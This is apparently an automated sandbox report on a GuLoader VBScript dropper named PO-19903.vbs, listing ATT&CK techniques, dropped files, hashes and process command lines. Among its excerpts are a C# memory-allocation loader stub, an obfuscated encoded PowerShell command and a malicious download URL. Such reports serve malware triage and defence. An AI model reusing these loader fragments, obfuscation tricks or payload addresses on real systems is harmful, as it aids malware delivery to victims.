    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07711A68 CreateNamedPipeW,18_2_07711A68
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter
    Path Interception12
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)12
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information
    Cached Domain Credentials12
    System Information Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 625175 Sample: PO-19903.vbs Startdate: 12/05/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected GuLoader 2->26 28 2 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 Wscript starts Powershell (via cmd or directly) 8->30 32 Very long command line found 8->32 34 Encrypted powershell cmdline option found 8->34 11 powershell.exe 22 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\nixooqy0.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    PO-19903.vbs20%ReversingLabsScript.Trojan.Valyria
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    https://vegproworld.com/wp-content/Touchb.vbs0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://vegproworld.com/wp-content/Touchb.vbstrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.799500951.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://go.micropowershell.exe, 00000012.00000002.801078678.0000000004BC7000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:625175
      Start date and time: 12/05/202213:29:192022-05-12 13:29:19 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 9m 26s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:PO-19903.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winVBS@8/9@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 7
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 23.211.6.115
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      13:33:25API Interceptor33x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):59179
      Entropy (8bit):7.382148699631125
      Encrypted:false
      SSDEEP:1536:h+3+oNMsrhj0KX8PR8u6DXwceBy0SE9trLu:Y+NuhQzJ8xrVf0bfLu
      MD5:DD9476AAE299F8CD938C0948F1F1C984
      SHA1:CB7F30DDE5A14A71FB33FDD8EDECADFBDB59F178
      SHA-256:6E63C9314D2B7EEFE27553D57326E4A39DCE0C360CDBF1E5B146C244A0E09EBA
      SHA-512:B2E5D0FC61FD41F9135960A0B1C602A3129E9C620ABC233476CFCAFAF827205A0A9E50B80920FFA1713D814C749D3D165462FD06C2EEF9F2AFA1F7A9841FDA3D
      Malicious:false
      Reputation:low
      Preview:......h#.a:.4$1..`.,$...ZZ.._1..4...r.@@@@9.u.W.......H;s..e.!.I.$....d.L.G.m.l..:..Z7.XvB.m.!......w.W.M.t....^)\...p*...2|.u....}w.....\.2(.7..F..{....p8...{..z.......c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.].....*../.@..../.ed.b.M`....s...1.....y.+T.T..j.e....R.du...i.2.N{.E...._aZ~...u.W...... :.P.8...V..@(..r%.......B.z....@E.R{ ..n~..@>.o.....B...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..k......qf...M...pPJs...V...m.'1.Z9J.8....%..%...q..*...\..v..b.....!..6.p}.n..9.X...k%....b....r...r.T.36...UJ9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o...........r.b=...A...C..r...J9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o........EI%....7.......r.J.1.....N..b.....!..6.p}.n..9.X...k%.'1.Z9J.8....%..%...q..*...\..v@...E.<...=./..L.Ht......D....F...L...X.(..v.Y+..%.X..r....E*Hn<../bI....7..<.........nf.r.(......G..P.H....]..%.
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):3.994300931044267
      Encrypted:false
      SSDEEP:24:Hkie9E2gmdQckXhHUaWhKE2mfII+ycuZhNFakSjPNnq9qd:NmdxkxkK1mg1ulFa3Jq9K
      MD5:F65AACFFA87FF3D50E26D4C74F94C373
      SHA1:6A99566969A7B48289D6386F84EF8D4FE349ECA6
      SHA-256:2033A2E3693269ADE25A9E859EACEF47C94FC8D3FEBF878C467FFF4C03763D49
      SHA-512:01FA0DC64D1B7C2F85B481D5B58F8A9E6279C5C56768C781885A841CC15574A686672D6F3B1B158A75D242DE11FE870B3631C38EAC677CE1E6D1E91676ADAE16
      Malicious:false
      Reputation:low
      Preview:L...!o}b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP...............J.K.R.y...AZ(^...........4.......C:\Users\user\AppData\Local\Temp\RESA741.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0798254431067904
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX
      MD5:4AA44B85520779C78689E0415A285E87
      SHA1:1EDE7161C51CF583512BE32B8DF895F7164CD25F
      SHA-256:46E3F9ED1DF836373FB977E8B1594AB433CDE01C35E2EBD4A9EE3FD022E77601
      SHA-512:DE78B379F9F0CA20008090E52BF4EA22F7F3BEFE6C12D95E14508319FB184B4843B3764B5C181642BD14DEF02294E6027E19665A8FA24184C8CE101C240F00C0
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.i.x.o.o.q.y.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):889
      Entropy (8bit):5.191875284747735
      Encrypted:false
      SSDEEP:24:JoVSAJt2mRmgkr7NJt29L81RfdafHNQRARU1uRihWRIM:JoVSAJtFmhr7NJtU0RoFQRARbRi4RIM
      MD5:EBEF46122B08728A01A250DF520357D7
      SHA1:D5DB4A89DA7DE1804EF133F7D81D56523044DA4C
      SHA-256:65013DE37A743262C3BEB05B409081A5CA852B93F72CA8CB70C83AAB0CE09F7C
      SHA-512:B81F4DDD72DD4F85AC5E0A0B9D7CBF148D834A89BAF9F4E9AAE8A1116D82E802A95F7FF3EE069500031650D4CFACA0F099DE92791B3E64D82299F39F4D89FAB8
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class Forly91..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string FABLE,uint Kongehus,int Disvoiceao,int Forly90,int Mainasche,int Moralit1,int TOREADO);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int Forly96,ref Int32 rustninger,int Pointsmenh,ref Int32 Forly9,int WORKSHIPME,int Forly97);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Pointsmenh0,uint Pointsmenh1,IntPtr Pointsmenh2,ref Int32 Pointsmenh3,int Pointsmenh4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Pointsmenh5,int Pointsmenh6);....}
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.257421030296142
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fbK/zxs7+AEszIWXp+N23fbK6:p37Lvkmb6KHSWZE8X
      MD5:48693CFB7F38C5B79F86BB3F5751649A
      SHA1:CBCCA55EB411FC67A21719C465522544D1DA95E1
      SHA-256:CF8CE8DDE5D4E150909FA1092194BA7F5C0CFDB3F7C30B2285B032DB336A58C6
      SHA-512:3AECB2BEBAEE3304E1210DF436EAB7DF4BEF6A8432AF3756D870529C708A9469DAC54567CEBF9215E9C89CF889980791B6F7237716AF5DA664F6B490E6B7DC76
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.269805058908348
      Encrypted:false
      SSDEEP:48:61PS4jyMCkVkEKE6jUoJjhRK1ulFa3Jq:QS8S2AJ3K
      MD5:36507B049F6D91A727D91ADFD1D9C592
      SHA1:EBBA55DCF7DAD9C6A18413787B2E18DB8CEF9AC6
      SHA-256:F6FEDE0CB43711520269A427502ED9FCA305A8E9D773A2612CCDB5A98A39BCC1
      SHA-512:4E8CC020F4C275C7671638BE815985D4C11420F9E0432AEA219CF0D22BAD3B67B5CD9558317F495FE648FA469F96CCF2689D2A32A7C4F168353D433E7776A54F
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... o}b...........!.................%... ...@....... ....................................@.................................p%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P .. ...........................................................BSJB............v4.0.30319......l.......#~..l...,...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................/.(.................~.....~.......................................... 6............ A............ F............ ^.!.......... c.+.......o.....u.....~.......................... ..o.....u.....~.........................
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.324821463087829
      Encrypted:false
      SSDEEP:24:KBqd3ka6KHDE8eKaM5DqBVKVrdFAMBJTH:Uika6ADE8eKxDcVKdBJj
      MD5:2EF8BA6AD66210702E42B88920DE0BF4
      SHA1:BACFCEF7CB56A80C16FB6814566E7DB5DE9BAA64
      SHA-256:CF60222670EF82500D1D6743EC94D6D972F2C5215DF4D759215DF8EB0A3447A0
      SHA-512:655105060533B91BF6CE7A0749EEDA10A233EC4CCDE1C17654B06AF2C7F460C62AFB64E7581E9AE94331B3724B50F3789A8B44FD0610EF5DDC64E4D7D5F1D5B6
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.507728980611977
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:PO-19903.vbs
      File size:256870
      MD5:0347b27843d88f73fdcd4dadb95549ac
      SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
      SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
      SHA512:368c6f19dc73693acd0f8c2513489ecb65bc763a6536de22a5421c05aff613191cd51379086765447b74faf28179e1253f7166d85ad9344a7a4be4442f1b9669
      SSDEEP:3072:UCZ+vnIxDSTz1EGYdx3VyZcd4B5RYe/aVPC1C:UCZ+vnWOtPYdLyDRYcaVqI
      TLSH:A544769245B1AFC8D1F839DFCB0D8620B2009D99A2D7F54C9AE211BD7FC72DA531B294
      File Content Preview:'Leaveni MIDLET ABSENTEREN TITTERE Stningssek SMDES SOCIOECON Afgjortele gaidropsar Undenize4 FORR ..'FLISEB kogasinu VALMUER Repac2 RESTA HYPERTRO Facittets6 forespoer Deklarer MATRAL Vier Epigraphe CAPRYLYLF Fintll3 EKSPE Duode Kakkelovn Netdriverw skry
      Icon Hash:e8d69ece869a9ec4
      No network behavior found

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:13:30:34
      Start date:12/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
      Imagebase:0x7ff6ea8a0000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
      Reputation:high

      Target ID:18
      Start time:13:32:58
      Start date:12/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# D i s d a i   D i s h u m a 5   S o r t   T A F F E   C r a m p o o n d   G R U N T I N G B   P r e a m b u l a t 3   A s s i m i l 6   F u r s e m i d e b   F u r i e n s d e c   A l a r m u r e 2   C h o r i b   H U M O   F I S T E L S T E M   S t e g e   c h e s s e   b a r r y m o r   A n n g r e t h e 3    
 # R e m i n g l i 4   e r n r   B e s p y t   S u l p h o z i n 8   V I R G U L A   I F R D   F o r e   P l u r a l v e k s 1   P r o f i l e n u   n o n f o   I n j u s t 9   N o u r i s h m e n 3   t o m a h a v k e n   E s s a y 1   B L A A   t r a n s m o g   h u l k   i n l a y e    
 # k v a r   K o b a n g f o r 6   H y p e r a r c 6   G A R D E R O B E N   O n c o s p h e r e   B u n g l i n   B A R Y T   T O M A S T E   C O R R O B O R A T   C Y K E L P A R   S t a d s l g 3   B a c i l l e b   B L U R T I N   a d m i n i s t r   M i l i e u b 3   B l a d e l e 8   a p o m e t a b    
 # P e a l 8   K i n g 9   O p m r k e r c o   I D E L I G E S I   S y s t e m a t 7   P r e o p e r 3   R e s o   S P A G N U M   L a n d   r e c k o n i   d e p r a v e r   f a r t j s f o r t   L A N N   G r i f f o n a g 3   A F S E   h j s d   a n a l y s e a r b   A M U L A S    
 # u n j o l l y   I n s t r u m e n   G L A L I I N G L   R e s o a p   W o m a n i   L e g g i e r 5   U N B R E A K I N G   O r i l l i o   a d r e a   A L T O L A T   F a g o 2   I n f l a m m a t 6   C O C K N E Y D O M   S Y M P O S I   g r a v e r e u   F O R U D   F A S T R E S F I   K o n t r o l   S K R L E V   A N A L Y T I K E R   U N C R   S o r t s r   v i d n e f r s   E O C A R B O   T a k t   B e t v i v l e r 3   V e l a r    
 # R e v a n c h e r   W o r d a b l e s   l o u s i e r m a   i n d l o g r b r n   A t t a   R E B L O W N G U   Q U E B R I T H C   G R N S E O V E R G   f r y t l e r n e s   L E M P E L I G E S    
 # a n d e l s s   C a m b a l l m 4   S o r t e r i n g   L n g s t l e v e n   o u t b o x e   S I G N I F I C A T   M a n a   D U N K A R D   U n s c o r   t r o n b   h y p o h e m i a g   M A T T E S T E   e n g r o s   F e r i 2   U N C O N V E   M i n d s t e h j   N i t r o g e n   c h e v   K o r p 6   s t t e d   m i s k r e d   u m e n n e s k e   G a l o p l o   U d s k r i v 2   M A G N E T O M E T   T R I L L I O N T H   H A A R B R S T E   I m m a t c 6   d r u e h   S s l a   C o u n t r y r o 2   N o n e x    
 # A l i s p h e n   s u l a   i d m m e l   T r i b r a c 2   T i l e g n e l   U n d e   d k s d   t u j a s u r   C i r c 8   B r o o   A p p e 1   O k s e h u d e   n e t s t r o e m   T e k n o l o g 2   k l o r e   B A L L A D R   U N F L U T T E R E   b o y k o   T i l b r i n g e   p h y s i   F E L W O   G e n e r i s k t v 5   S u k k e   L o d g e a r t 3    
 # U n e v a d a   E n c e p h 2   p o l e r e m i   z a k a r i a s s   s c o l l   B o a t l 7   S a m a r   H u t c h i   a c e t a n i o n   I N T E   S t u b b   a l d e   L a m b k   N o n r e t r a   S k a n d a l e h   p r e c e l e b r a   P r o t o p r e s 5   l i v s f o r s i   U P B R I M A M B   S H I V E   U n c a 3   k r e a t i   H o v e d a f s   W u g g l i k    
 # U N D G A A R T A   K n u d 7   t r a p p e t r i n   f i r e m a s t e r   U N I N T O X I   A r c h e   R E D U   m y x o n   M u t u a l 5   b l o k r   S t i l s k   A i g u i l l e s q 7   s p e w i e   P a s k o 8   H o v e d t r a p   S i o u   C r e a t u   M u g g   A R T W O R K S K O   R A A D Y R E N E   P o o r l 9   A d v o k a t f o r   A b o r t 2   m o r s e l i z e n    
 # o m m a t i d i   M U L L I G A N S U   B e n e n d 7   s p r j t e g i   C e m e n 7   G e n e r a t o r e   S N A P S E F   B O T A N   i n f a   F a a m l t m e t 3   f i s k e r k   B j r g e r n e p   S a b e 2   A k t i o   E r f u 7   F u s i o n e r i 2   L U D O S T A N D   B A T H O R S E C   r e v o   s a n s e o r   A f s t i g 9   S T R A F F   E r k l r i n g s m   A r b e j d   S p e c t 7   P r o g r a m 4   J O U N C I   P r e o u t l   a s t r o f y s i   S T E N Z E B R N   A p p o   f i l m o   K o m m a e r s    
 # A b d u l s u f 2   C i v i l 7   C a r a c a   H e m i h y d r o   p o d o d y n i a   g a l a   H E L O D E R M W   A u d i t i v   H O M E W O R T F R   u p s r i   f l e u r e t t e r   r e m a t   u n e x c e r p t   S p i l l e r e l 4   I N D K   G r a d d a g s h   o c u l a   B a n t a m v g t   U n d e   U o p s k a a r 7   L y s p u n k t e 5   k o m m a n d o l   T i l b a 2    
 # R e v n e r n e p r   c o l u m b   S y n d   U N G L O B U L A   O p d e   H e i k o s a m a   B a a n d 5   c o s t o c l a   f a m i   H e r s c h 6   T R U T M U N D   A n l i s m 9   O L I B A N U M   N O M I N A L N   I l d f u g l s   d i r e c t o   S h a p e   U p a s s e l i g   p a r a b u   W h i f f   D I G E D E S   S k a a n s e l s l 4   o p t r k k e   E r l a g t e 7   v i e l s e a f f   F r i l a n 2   S e d a n e   S y n e o m t v i s 9   u n c i a l r e   H v a l f a    
 # A v i s s p a 7   o f f b e a t s b   B r i g g e r n e s   S t a n d a r d u 4   U N S P E E D   A m e r i c a n i   C Y S T O L   U N P E N   Z e t a 9   u n c r u m p   E u r o p 8   F o r s v a r 8   T e n n i s f i 6   E t i s k 5   S i a m e s 5   g a l g e n f u   M o t h e r s o m 6   E r e m 1   K Y L L I N   A n d r e n i d   p i s o t e i n c l   M e t a s o m a s i   I r r a t i o   V A L L O N E R E N   S k u l d 8   B I U N I T Y K    
 # A d s b l o r c h i 5   Q u i n q u e   H E M I C E   u d k o m m e   s k a r l   U P P U F F N E G R   P I N E S A   A T H E R O   f o r y n g   u n c o n f i d   I d o n e i   O r t h o d o x i 2   s t y r e   a f d d e   S L U T T E D E    
 # D I A C O N I   K v a n t i t 5   u n d f l y e d e   P r a e s   T U P E K S O M N   d e m e n t   T m r e s   A n t e m a r g 5   A v o w e i n d 9   p r i b   H E L I N G    
 # S I D E O R D N   G a l v a n o p   S y f i l 8   c y d i p p i   S h a m a n   G u a n s   S l a p p e r 1   E n s u   S t u d y s f u   c e c i   A f t e n 7   s l a p p e l   T R I T O N E   M u s i c l i 5   H e r t u g d m m e   f o r m a n e n d   b r a i l l e s d i   H O M E L I   P L E A   p u r i f i c a t   F A L B Y D E L S E    
 # I N T R   G r a v l s v a r m   m u s i k h a   C h a i r m 4   F r i b o s s a 5   T i l s m u d 5   d y s f u n   k h a r o   V e r d   S U P E R   I n a p p e t   C O O L N E S S E S   B a g v   F l o r i f   A r c i f o   P t y a l 4   P a d s a   S k a a l 3   D U L L Y H J L P   S m i t s 2   F l y v e   T r o l d d o m s 9   u f o r u   u n v o   D R A G N   f a n t a s i l    
 # F r y g t e g o o d   M a g n e   S t y r e f j e r e   T i n f u   p i n f   n d t v u n   S e k s u a   T i l s t n i 7   V r d i p a 8   U n f a v o r 9   S t a l 6   t o p c o a t i n   G O D K   N a g s m a n   L U T I S T S U D E   B E L L A D   P a l t   O p s t   C I R C U   K l a m r e   a f g r f t e   F r e m k a l d e    
